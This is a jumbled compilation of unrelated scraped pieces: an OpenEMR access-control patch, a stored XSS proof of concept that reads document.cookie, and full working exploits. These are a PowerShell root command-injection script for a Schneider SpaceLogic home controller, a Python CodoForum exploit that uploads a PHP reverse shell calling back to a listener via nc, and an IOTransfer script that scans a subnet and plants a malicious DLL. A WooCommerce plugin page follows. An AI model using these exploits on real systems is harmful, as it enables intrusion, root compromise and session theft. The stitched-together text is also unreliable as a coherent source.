include\_once("$incdir/forms/LBF/new.php");

@@ -25,6 +30,14 @@

// ensure the path variable has no illegal characters

check\_file\_dir\_name($\_GET\["formname"\]);

  

// ensure authorized to see the form

if (!AclMain::aclCheckForm($\_GET\["formname"\])) {

$formLabel = xl\_form\_title(getRegistryEntryByDirectory($\_GET\["formname"\], 'name')\['name'\] ?? '');

$formLabel = (!empty($formLabel)) ? $formLabel : $\_GET\["formname"\];

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => $formLabel\]);

exit;

}

  

include\_once("$incdir/forms/" . $\_GET\["formname"\] . "/new.php");

}

  

@@ -23,11 +23,29 @@

use OpenEMR\\Billing\\BillingUtilities;

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

use OpenEMR\\OeUI\\OemrUI;

use OpenEMR\\PaymentProcessing\\Sphere\\SpherePayment;

use OpenEMR\\Services\\FacilityService;

  

if (!empty($\_REQUEST\['receipt'\]) && empty($\_POST\['form\_save'\])) {

if (!AclMain::aclCheckCore('acct', 'bill') && !AclMain::aclCheckCore('acct', 'rep\_a') && !AclMain::aclCheckCore('patients', 'rx')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Receipt for Payment")\]);

exit;

}

} else {

if (!AclMain::aclCheckCore('acct', 'bill', '', 'write')) {

if (!empty($\_POST\['form\_save'\])) {

$pageTitle = xl("Receipt for Payment");

} else {

$pageTitle = xl("Record Payment");

}

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => $pageTitle\]);

exit;

}

}

  

$pid = (!empty($\_REQUEST\['hidden\_patient\_code'\]) && ($\_REQUEST\['hidden\_patient\_code'\] > 0)) ? $\_REQUEST\['hidden\_patient\_code'\] : $pid;

  

$facilityService = new FacilityService();

CVE-2022-2493: bug fixes b1 (#5280) · openemr/openemr@871ae51

Cross-site Scripting (XSS) - Stored in GitHub repository openemr/openemr prior to 7.0.0.

**Description**

openemr / openemr is vulnerable to Cross-site Scripting (XSS) - Stored

**Proof of Concept**

    // Poc 
    <script>alert(document.cookie)</script>
    

steps to reproduce:

    1) login open emr patient portal https://demo.openemr.io/openemr/portal/index.php
    
    2) goto my profile in https://demo.openemr.io/openemr/portal/home.php
    
    ​3)click on pending review.
    
    4)add the payload in the first name /middle name  (<script>alert(document.cookie)</script>)
    
    5) click  submit changes
    
    6) after that we get an with Error: Patient was successfully updated
    
    7) on clicking  pending review  the xss wil be triggered
    

**Impact**

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

CVE-2022-2494: Cross-site Scripting (XSS) - Stored in openemr

Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) versions 1.31.460 and below suffer from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user via the name GET parameter in delsnap.pl Perl/CGI script which is used for deleting snapshots taken from the webcam.

    <#SpaceLogic.ps1Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root ExploitVendor: Schneider Electric SEProduct web page: https://www.se.com                  https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/                  https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmwareAffected version: SpaceLogic C-Bus Home Controller (5200WHC2)                  formerly known as C-Bus Wiser Home Controller MK2                  V1.31.460 and prior                  Firmware: 604Summary: SpaceLogic C-Bus Home Automation SystemLighting control and automation solutions forbuildings of the future, part of SpaceLogic.SpaceLogic C-Bus is a powerful, fully integratedsystem that can control and automate lightingand many other electrical systems and products.The SpaceLogic C-Bus system is robust, flexible,scalable and has proven solutions for buildingsof the future. Implemented for commercial andresidential buildings automation, it bringscontrol, comfort, efficiency and ease of useto its occupants.Wiser Home Control makes technologies in yourhome easy by providing seamless control of music,home theatre, lighting, air conditioning, sprinklersystems, curtains and shutters, security systems...you name it. Usable anytime, anywhere even whenyou are away, via preset shortcuts or directcontrol, in the same look and feel from a wallswitch, a home computer, or even your smartphoneor TV - there is no wiser way to enjoy 24/7connectivity, comfort and convenience, entertainmentand peace of mind homewide! The Wiser 2 Home Controller allows you to accessyour C-Bus using a graphical user interface, sometimesreferred to as the Wiser 2 UI. The Wiser 2 HomeController arrives with a sample project loadedand the user interface accessible from your localhome network. With certain options set, you canalso access the Wiser 2 UI from anywhere usingthe Internet. Using the Wiser 2 Home Controlleryou can: control equipment such as IP cameras,C-Bus devices and non C-Bus wired and wirelessequipment on the home LAN, schedule events inthe home, create and store scenes on-board, customisea C-Bus system using the on-board Logic Engine,monitor the home environment including C-Bus andsecurity systems, control ZigBee products suchas Ulti-ZigBee Dimmer, Relay, Groups and Curtains.Examples of equipment you might access with Wiser2 Home Controller include lighting, HVAC, curtains,cameras, sprinkler systems, power monitoring, Ulti-ZigBee,multi-room audio and security controls.Desc: The home automation solution suffers froman authenticated OS command injection vulnerability.This can be exploited to inject and execute arbitraryshell commands as the root user via the 'name' GETparameter in 'delsnap.pl' Perl/CGI script which isused for deleting snapshots taken from the webcam.=========================================================/www/delsnap.pl:----------------01: #!/usr/bin/perl02: use IO::Handle;03:04:05: select(STDERR);06: $| = 1;07: select(STDOUT);08: $| = 1;09:10: #print "\r\n\r\n";11:12: $CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/';13: use CGI;14:15: my $PROGNAME = "delsnap.pl";16:17: my $cgi = new CGI();18:19: my $name = $cgi->param('name');20: if ($name eq "list") {21:     print "\r\n\r\n";22:     print "DATA=";23:     print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`;24:     exit(0);25: }26: if ($name eq "deleteall") {27:     print "\r\n\r\n";28:     print "DELETINGALL=TRUE&";29:     print `rm /mnt/microsd/clipsal/ugen/imgs/*`;30:     print "COMPLETED=true\n";31:     exit(0);32: }33: #print "name $name\n";34: print "\r\n\r\n";35: my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name";36:37: unlink $filename or die "COMPLETED=false\n";38:39: print "COMPLETED=true\n";=========================================================Tested on: Machine: OMAP3 Wiser2 Board           CPU: ARMv7 revision 2           GNU/Linux 2.6.37 (armv7l)           BusyBox v1.22.1           thttpd/2.25b           Perl v5.20.0           Clipsal 81           Angstrom 2009.X-stable           PICED 4.14.0.100           lighttpd/1.7           GCC 4.4.3           NodeJS v10.15.3Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5710Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.phpVendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdfCVE ID: CVE-2022-34753CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3475327.03.2022#>$host.UI.RawUI.ForegroundColor = "Green"if ($($args.Count) -ne 2)  {    Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n")} else {    $ip = $args[0]    $cmd = $args[1]    $cmdinj = "/delsnap.pl?name=|$cmd"    Write-Host("`nSending command '$cmd' to $ip`n")    #curl -Headers @{Authorization = "Basic XXXX"} -v $ip$cmdinj    curl -v $ip$cmdinj}<#PoCPS C:\> .\SpaceLogic.ps1Usage: .\SpaceLogic.ps1 [IP] [CMD]PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd"Sending command 'uname -a;id;pwd' to 192.168.1.2VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payloadVERBOSE: received 129-byte response of content type text/html; charset=utf-8StatusCode        : 200StatusDescription : OKContent           : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux                    uid=0(root) gid=0(root)                    /custom-package                    RawContent        : HTTP/1.1 200 OK                    Access-Control-Allow-Origin: *                    Connection: keep-alive                    Content-Length: 129                    Content-Type: text/html; charset=utf-8                    Date: Thu, 30 Jun 2022 14:48:43 GMT                    ETag: W/"81-LTIWJvYlDBYAlgXEy...Forms             : {}Headers           : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html;                     charset=utf-8]...}Images            : {}InputFields       : {}Links             : {}ParsedHtml        : mshtml.HTMLDocumentClassRawContentLength  : 129PS C:\>#>

Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root

CodoForum version 5.1 suffers from a remote code execution vulnerability.

    # Exploit Title: CodoForum v5.1 - Remote Code Execution (RCE)# Date: 06/07/2022# Exploit Author: Krish Pandey (@vikaran101)# Vendor Homepage: https://codoforum.com/# Software Link: https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip# Version: CodoForum v5.1# Tested on: Ubuntu 20.04# CVE: CVE-2022-31854#!/usr/bin/python3import requestsimport timeimport optparseimport randomimport stringbanner = """  ______     _______     ____   ___ ____  ____      _____ _  ___ ____  _  _    / ___\ \   / / ____|   |___ \ / _ \___ \|___ \    |___ // |( _ ) ___|| || |  | |    \ \ / /|  _| _____ __) | | | |__) | __) |____ |_ \| |/ _ \___ \| || |_ | |___  \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) | | (_) |__) |__   _| \____|  \_/  |_____|   |_____|\___/_____|_____|   |____/|_|\___/____/   |_|  """print("\nCODOFORUM V5.1 ARBITRARY FILE UPLOAD TO RCE(Authenticated)")print(banner)print("\nExploit found and written by: @vikaran101\n")parser = optparse.OptionParser()parser.add_option('-t', '--target-url', action="store", dest='target', help='path of the CodoForum v5.1 install')parser.add_option('-u', '--username', action="store", dest='username', help='admin username')parser.add_option('-p', '--password', action="store", dest='password', help='admin password')parser.add_option('-i', '--listener-ip', action="store", dest='ip', help='listener address')parser.add_option('-n', '--port', action="store", dest='port', help='listener port number')options, args = parser.parse_args()proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}if not options.target or not options.username or not options.password or not options.ip or not options.port:    print("[-] Missing arguments!")    print("[*] Example usage: ./exploit.py -t [target url] -u [username] -p [password] -i [listener ip] -n [listener port]")    print("[*] Help menu: ./exploit.py -h OR ./exploit.py --help")    exit()loginURL = options.target + '/admin/?page=login'globalSettings = options.target + '/admin/index.php?page=config'payloadURL = options.target + '/sites/default/assets/img/attachments/'session = requests.Session()randomFileName = ''.join((random.choice(string.ascii_lowercase) for x in range(10)))def getPHPSESSID():        try:        get_PHPID = session.get(loginURL)        headerDict = get_PHPID.headers        cookies = headerDict['Set-Cookie'].split(';')[0].split('=')[1]        return cookies    except:        exit()phpID = getPHPSESSID()def login():    send_cookies = {'cf':'0'}    send_headers = {'Host': loginURL.split('/')[2], 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','Content-Type':'multipart/form-data; boundary=---------------------------2838079316671520531167093219','Content-Length':'295','Origin':loginURL.split('/')[2],'Connection':'close','Referer':loginURL,'Upgrade-Insecure-Requests':'1'}    send_creds = "-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"username\"\n\nadmin\n-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"password\"\n\nadmin\n-----------------------------2838079316671520531167093219--"    auth = session.post(loginURL, headers=send_headers, cookies=send_cookies, data=send_creds, proxies=proxy)    if "CODOFORUM | Dashboard" in auth.text:        print("[+] Login successful")def uploadAndExploit():    send_cookies = {'cf':'0', 'user_id':'1', 'PHPSESSID':phpID}    send_headers = {'Content-Type':'multipart/form-data; boundary=---------------------------7450086019562444223451102689'}    send_payload = '\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_title"\n\nCODOLOGIC\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_description"\n\ncodoforum - Enhancing your forum experience with next generation technology!\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="admin_email"\n\nadmin@codologic.com\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="default_timezone"\n\nEurope/London\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="register_pass_min"\n\n8\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_all_topics"\n\n30\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_cat_topics"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_per_topic"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_path"\n\nassets/img/attachments\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_exts"\n\njpg,jpeg,png,gif,pjpeg,bmp,txt\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_size"\n\n3\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_mimetypes"\n\nimage/*,text/plain\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_num"\n\n5\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_len"\n\n15\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="reply_min_chars"\n\n10\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="insert_oembed_videos"\n\nyes\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_privacy"\n\neveryone\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="approval_notify_mails"\n\n\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_header_menu"\n\nsite_title\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_logo"; filename="' + randomFileName + '.php"\nContent-Type: application/x-php\n\n<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ' + options.ip + ' ' + options.port + ' >/tmp/f");?> \n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="login_by"\n\nUSERNAME\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="force_https"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="user_redirect_after_login"\n\ntopics\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_hide_topic_messages"\n\noff\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_infinite_scrolling"\n\non\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="show_sticky_topics_without_permission"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="CSRF_token"\n\n23cc3019cadb6891ebd896ae9bde3d95\n-----------------------------7450086019562444223451102689--\n'    exploit = requests.post(globalSettings, headers=send_headers, cookies=send_cookies, data=send_payload, proxies=proxy)    print("[*] Checking webshell status and executing...")    payloadExec = session.get(payloadURL + randomFileName + '.php', proxies=proxy)    if payloadExec.status_code == 200:        print("[+] Payload uploaded successfully and executed, check listener")    else:        print("[-] Something went wrong, please try uploading the shell manually(admin panel > global settings > change forum logo > upload and access from " + payloadURL +"[file.php])")login()uploadAndExploit()

CodoForum 5.1 Remote Code Execution

IOTransfer version 4.0 suffers from a remote code execution vulnerability.

    # Exploit Title: IOTransfer V4 – Remote Code Execution (RCE)# Date: 06/22/2022# Exploit Author: Tomer Peled# Vendor Homepage: https://www.iobit.com# Software Link: https://iotransfer.itopvpn.com/# Version: V4 and onward# Tested on: Windows 10# CVE : 2022-24562# References: https://github.com/tomerpeled92/CVE/tree/main/CVE-2022%E2%80%9324562import osfrom urllib3.exceptions import ConnectTimeoutErrorfrom win32com.client import *import requestsimport jsonlocalPayloadPath = r"c:\temp\malicious.dll"remotePayloadPath="../Program Files (x86)/Google/Update/goopdate.dll"remoteDownloadPath = r'C:\Users\User\Desktop\obligationservlet.pdf'Range = "192.168.89"UpOrDown="Upload"IP = ""UserName = ""def get_version_number(file_path):    information_parser = Dispatch("Scripting.FileSystemObject")    version = information_parser.GetFileVersion(file_path)    return versiondef getTaskList(IP, taskid=""):    print("Getting task list...")    url = f'http://{IP}:7193/index.php?action=gettasklist&userid=*'    res = requests.get(url)    tasks = json.loads(res.content)    tasks = json.loads(tasks['content'])    for task in tasks['tasks']:        if taskid == task['taskid']:            print(f"Task ID found: {taskid}")def CreateUploadTask(IP):    SetSavePath(IP)    url = f'http://{IP}:7193/index.php?action=createtask'    task = {        'method': 'get',        'version': '1',        'userid': '*',        'taskstate': '0',    }    res = requests.post(url, json=task)    task = json.loads(res.content)    task = json.loads(task['content'])    taskid = task['taskid']    print(f"[*] TaskID: {taskid}")    return taskiddef CreateUploadDetailNode(IP, taskid, remotePath, size='100'):    url = f'http://{IP}:7193/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0'    file_info = {        'size': size,        'savefilename': remotePath,        'name': remotePath,        'fullpath': r'c:\windows\system32\calc.exe',        'md5': 'md5md5md5md5md5',        'filetype': '3',    }    res = requests.post(url, json=file_info)    js = json.loads(res.content)    print(f"[V] Create Detail returned: {js['code']}")def readFile(Path):    file = open(Path, "rb")    byte = file.read(1)    next = "Start"    while next != b'':        byte = byte + file.read(1023)        next = file.read(1)        if next != b'':            byte = byte + next    file.close()    return bytedef CallUpload(IP, taskid, localPayloadPath):    url = f'http://{IP}:7193/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0'    send_data = readFile(localPayloadPath)    try:        res = requests.post(url, data=send_data)        js = json.loads(res.content)        if js['code'] == 200:            print("[V] Success payload uploaded!")        else:            print(f"CreateRemoteFile: {res.content}")    except:        print("[*] Reusing the task...")        res = requests.post(url, data=send_data)        js = json.loads(res.content)        if js['code'] == 200 or "false" in js['error']:            print("[V] Success payload uploaded!")        else:            print(f"[X] CreateRemoteFile Failed: {res.content}")def SetSavePath(IP):    url = f'http://{IP}:7193/index.php?action=setiotconfig'    config = {        'tasksavepath': 'C:\\Program '    }    requests.post(url, json=config)def ExploitUpload(IP,payloadPath,rPath,taskid =None):    if not taskid:        taskid = CreateUploadTask(IP)        size = os.path.getsize(payloadPath)    CreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size))    CallUpload(IP, taskid, payloadPath)def CreateDownloadTask(IP, Path) -> str:    url = f'http://{IP}:7193/index.php?action=createtask'    task = {        'method': 'get',        'version': '1',        'userid': '*',        'taskstate': '0',        'filepath': Path    }    res = requests.post(url, json=task)    task = json.loads(res.content)    task = json.loads(task['content'])    taskid = task['taskid']    print(f"TaskID: {taskid}")    return taskiddef ExploitDownload(IP, DownloadPath, ID=None):    if ID:        url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={ID}'    else:        taskid = CreateDownloadTask(IP, DownloadPath)        url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={taskid}'    res = requests.get(url)    return resdef ScanIP(startRange):    print("[*] Searching for vulnerable IPs", end='')    Current = 142    IP = f"{startRange}.{Current}"    VulnerableIP: str = ""    UserName: str = ""    while Current < 252:        print(".", end='')        url = f'http://{IP}:7193/index.php?action=getpcname&userid=*'        try:            res = requests.get(url, timeout=1)            js = json.loads(res.content)            js2 = json.loads(js['content'])            UserName = js2['name']            VulnerableIP=IP            print(f"\n[V] Found a Vulnerable IP: {VulnerableIP}")            print(f"[!] Vulnerable PC username: {UserName}")            return VulnerableIP,UserName        except Exception as e:            pass        except ConnectTimeoutError:            pass        IP = f"{startRange}.{Current}"        Current = Current + 1    return None,Noneif __name__ == '__main__':    IP,UserName = ScanIP(Range)    if IP is None or UserName is None:        print("[X] No vulnerable IP found")        exit()    print("[*] Starting Exploit...")    if UpOrDown == "Upload":        print(f"[*]Local Payload Path: {localPayloadPath}")        print(f"[*]Remote Upload Path: {remotePayloadPath}")        ExploitUpload(IP,localPayloadPath,remotePayloadPath)    elif UpOrDown == "Download":        print(f"[*] Downloading the file: {remoteDownloadPath}")        res = ExploitDownload(IP, remoteDownloadPath)        file = open("out.pdf", "wb+")        file.write(res.content)        file.close()

IOTransfer 4.0 Remote Code Execution

Authenticated (custom plugin role) Arbitrary File Read via Export function vulnerability in GiveWP's GiveWP plugin <= 2.20.2 at WordPress.

CVE-2022-31475: GiveWP – Donation Plugin and Fundraising Platform

Broken Access Control vulnerability in YIKES Inc. Custom Product Tabs for WooCommerce plugin <= 1.7.7 at WordPress leading to &yikes-the-content-toggle option update.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

This plugin extends WooCommerce to allow shop owners to add custom tabs to products. The tabs are displayed on the individual product pages to the right of the default “Description” tab.

Individual product tabs are managed on the WooCommerce Edit Product screen and can be added on a per product basis. You can also create saved tabs and add them to multiple products as needed. Tabs can be easily added, deleted and rearranged.

Tab content areas use the standard WordPress text editor and may contain text, images, HTML or shortcodes.

If you experience any problems, please submit a ticket on our Free WordPress Support Forums and we’ll look in to it as soon as possible.

This plugin is compatible with WPML.

Upgrade to Custom Product Tabs Pro for great enhanced features!

1.  Download the plugin .zip file and make note of where on your computer you downloaded it to.
2.  In the WordPress admin (yourdomain.com/wp-admin) go to Plugins > Add New or click the “Add New” button on the main plugins screen.
3.  On the following screen, click the “Upload Plugin” button.
4.  Browse your computer to where you downloaded the plugin .zip file, select it and click the “Install Now” button.
5.  After the plugin has successfully installed, click “Activate Plugin” and enjoy!
6.  Edit a product, then click on ‘Custom Tab’ within the ‘Product Data’ panel
7.  Create saved, reusable tabs under Settings > Custom Product Tabs for WooCommerce

**All documentation can be found in our Knowledge Base.**

**Where do I go to add tabs to a product?**

When editing a product in WooCommerce, you will find “Custom Tabs” in the bottom left corner of the Product Data box. Click on “Custom Tabs” to reveal the custom tab manager.

**Where will these tabs appear?**

When the product is viewed on your website you will see the tabs you created to the right of the default “Description” tab.

**How do I change the order of the tabs?**

To change the order of custom tabs use the up and down “Move tab order” arrows.

**How do saved tabs work?**

Saved tabs are tabs you can create and then add to as many products you would like. If you update a saved tab, the changes will be updated for all products using that tab.

**How do I create saved tabs?**

To create a saved tab, click on the ‘Custom Product Tabs’ item on the WordPress dashboard menu and click the “Add Tab” button.

**How do I add a saved tab to a product?**

To add a saved tab to a product, go to the custom tabs section on the edit product screen, click the ‘Add a Saved Tab’ button above the tab, and choose which tab you would like to add.

**What does overriding a saved tab do?**

When using a saved tab on a product, a checkbox appears with the message ‘Override Saved Tab’ If you click that checkbox, edit the tab and save, the tab will be changed for that product only. Any edits to that saved tab under ‘Custom Product Tabs’ will not be applied to that product.

**Why does the WYSIWYG editor default to the ‘Visual’ tab?**

This was added in version 1.5 to support the dynamic adding and removing of the wp\_editor/WYSIWYG editor. Without this setting, the WYSIWYG editor does not load the correct toolbar and the editor can potentially break.

**Does custom tab data get exported with standard WooCommerce product data?**

Yes! Since v1.4 we’ve added the necessary code to ensure the custom tab data is exported with all of the other standard WooCommerce data. This ensures a smooth transition of products between sites.

Thank you for creating this useful plugin.

Hey Guys, I really respect that you think about the others. <3 <3 <3

Doesn't display new tabs, even with the apply\_filters checked. Useless for me.

I just added this plugin to a site and so far it works great. Thanks to the author!

Thank you very much for such helpful and very simple tabs for the woocommerce.

Every time there is an update something stops working.

Read all 145 reviews

“Custom Product Tabs for WooCommerce” is open source software. The following people have contributed to this plugin.

Contributors

**1.7.9 – June 21st, 2022**

*   Address minor vulnerability
*   Fix issue related to Divi Builder

**1.7.7 – March 8th, 2021**

*   Housekeeping

**1.7.6 – October 19th, 2020**

*   WooCommerce 4.6 tested.

**1.7.5 – September 18th, 2020**

*   Swapping (deprecated) wp\_make\_content\_images\_responsive for wp\_filter\_content\_tags in our content filter. Thanks @stephencd!

**1.7.4 – September 12th, 2020**

*   WooCommerce 4.5.

**1.7.3 – August 19th, 2020**

*   WooCommerce 4.4.
*   Fixes issues related to WordPress 5.5.

**1.7.1 – March 13th, 2020**

*   Fixes a bug with product display in certain conditions.

**1.7.0 – March 10th, 2020**

*   Toggle the content filter on or off setting added. Use this to help with compatibility.
*   Support WooCommerce 4.0.
*   Support WordPress 5.4.

**1.6.13 – January 22nd, 2020**

*   Support WooCommerce 3.9.

**1.6.12 – November 20th, 2019**

*   Support WooCommerce 3.8.

**1.6.11 – September 25th, 2019**

*   Adding additional checks to post global before enqueueing assets.

**1.6.10 – April 19th, 2019**

*   Updating WC compatibility.
*   Fixing JS issue with WP backwards compatibility for versions < 4.7.

**1.6.9 – January 18th, 2019**

*   Fixing an issue where the visual editor shows a small portion of the content on product edit pages.

**1.6.8 – January 2nd, 2019**

*   Fixing some HTML markup.
*   Applying PHPCS fixes.

**1.6.7 – December 18th, 2018**

*   Adding filter to help allow importing of custom tabs.
*   Changing our export filters so custom tabs work with WooCommerce’s native meta export/import features.
*   The default capability for all admin pages is now publish_products.

**1.6.6 – October 26th, 2018**

*   Bumping WooCo Compatibility.
*   Changed wp_send_json_failure() to wp_send_json_error().

**1.6.5 – October 3rd, 2018**

*   Bumping WooCo Compatibility.

**1.6.4 – January 9th, 2018**

*   Happy new year!
*   The editor is now vertically resizeable.
*   The default capability for interacting with saved tabs is now Publish Products (publish\_products)

**1.6.3 – November 1st, 2017**

*   Declaring compatibility with WooCommerce and WordPress

**1.6.2 – October 13th, 2017**

*   Fixed a PHP Fatal Error that was occurring for users with PHP versions < 5.5.
*   Updated some of our documentation and language

**1.6.1 – October 12th, 2017**

*   Fixed an issue with handling foreign characters. Foreign character tab titles should be working properly now. Sorry about that everyone!
*   Added support for native WooCommerce exporting. You can now export and import your tabs with just WooCommerce!
*   Fixed some styling issues
*   Added a new “Support” page
*   Added a new “Go Pro” page – check out Custom Product Tabs Pro

**1.6.0 – October 9th, 2017**

*   Complete re-organization of all plugin files and removal of legacy code
*   Added a “name” field for saved tabs. This field is used only on the admin as a way of identifying tabs.
*   Tab “slugs” are now created via the WP Core sanitize_title() function. This should allow meaningful tab slugs when foreign characters are used in a title.
*   Re-added the “Add Media” button to the editor when it’s first initialized. This had disappeared when WP4.8 was released.
*   Fixed some issues with loading saved tab content into the editor. This should fix the issue that some users were experiencing where adding a saved tab would only work the second time.
*   Setting the width of the editor to 100%.
*   Custom Product Tabs is now a top-level menu item instead of a sub-menu item.
*   Cleaning up the saved tab’s array so we don’t leave orphaned data (e.g. added a hook so we delete a product’s tabs when the product is deleted)
*   Added a data update script to update all existing tab slugs to use sanitize_title() function.
*   Generated new POT file.
*   Added support and hooks for our new Custom Product Tabs Pro plugin!

**1.5.17 – August 23rd, 2017**

*   Cleaning up some PHP Notices being thrown – thanks to @ZombiEquinox on GitHub for reporting this
*   Updating readme compatibility values

**1.5.16 – August 1st, 2017**

*   Adding a proper deactivation hook. The plugin will leave no trace.

**1.5.15 – June 8th, 2017**

*   WordPress 4.8 support – using the new JavaScript Editor API functions to instantiate the editor and removed requiring WordPress’ wpembed plugin

**1.5.14 – May 8th, 2017**

*   Updating some CSS for the admin tabs table – the table should now render correctly regardless of “Visual” or “Text” tab and the saved tabs list should include a scrollbar if necessary

**1.5.13 – April 17th, 2017**

*   Updating a WooCommerce action – now using the proper one instead of a deprecated one

**1.5.12 – April 10th, 2017**

*   Adding some CSS to allow the editor’s text mode to function properly

**1.5.11 – April 6th, 2017**

*   Checking for the existence of the get_id() method before using it.

**1.5.10 – April 5th, 2017**

*   Duplicating a product now duplicates custom product tabs and saved tabs correctly

**1.5.9 – April 4th, 2017**

*   Tested and updated the plugin for WooCommerce v3.0.0

**1.5.8 – March 17th, 2017**

*   Replaced the saved tab’s ID w/ an “Add New” button on the single saved tab page – it should be easier to add saved tabs in bulk now
*   Added a filter for all of the custom tab content – it should allow you to apply custom logic such as permissions in one central location
*   Changed the way saved tabs are applied on the edit product page – it should allow embed content (especially Google Maps Embed content) to function correctly in all instances.

**1.5.7 – February 27th, 2017**

*   Duplicating a product now duplicates the corresponding saved tabs correctly
*   Added two filters (yikes_woo_use_the_content_filter and yikes_woo_filter_main_tab_content) to help provide a work-around to using the standard the_content filter which has caused numerous issues due to plugin conflicts.

**1.5.6 – February 16th, 2017**

*   Fixed an issue where the “Add a Saved Tab” modal was displaying YouTube videos if a saved tab had a YouTube URL in its content

**1.5.5 – January 23rd, 2017**

*   Re-did 1.5.4 changes – checking for function existence before using it

**1.5.4 – January 23rd, 2017**

*   Re-did 1.5.3 changes – the_content filter is reapplied and the specific Site Builder plugin’s filters are

**1.5.3 – January 23rd, 2017**

*   Replaced the use of the_content filter with the filter’s associated functions (e.g. wptexturize, wpautop)

**1.5.2 – December 23rd, 2016**

*   The editor should only default to the ‘Visual’ tab for our Custom Product Tabs (no other editors)
*   Added all of the default WordPress settings to the editor

**1.5.1 – December 22nd, 2016**

*   Fixed bug that caused content to be copied incorrectly when moving tabs up / down
*   Only on the product page will the editor default to ‘Visual’ (instead of every page)

**1.5 – December 20th, 2016**

*   Version 1.5 includes a brand new feature – saved tabs – as well as a number of bug fixes, style tweaks, code clean-up, and comments
*   UI: Complete overhaul of the custom tab interface for an easier, responsive tab creating experience.
*   Saved Tabs: A new settings page has been added for users to create / update / delete saved tabs (see FAQ for more information)
*   Saved Tabs: On the product edit page, a new button (‘Add a Saved Tab’) has been added that allows you to choose one of your saved tabs and add it to the current product
*   Adding a new tab initializes a new wp\_editor (WYSIWYG) instead of a plain textarea
*   Added warning message when two tabs have the same title
*   Tabs with empty titles are no longer shown on the product page
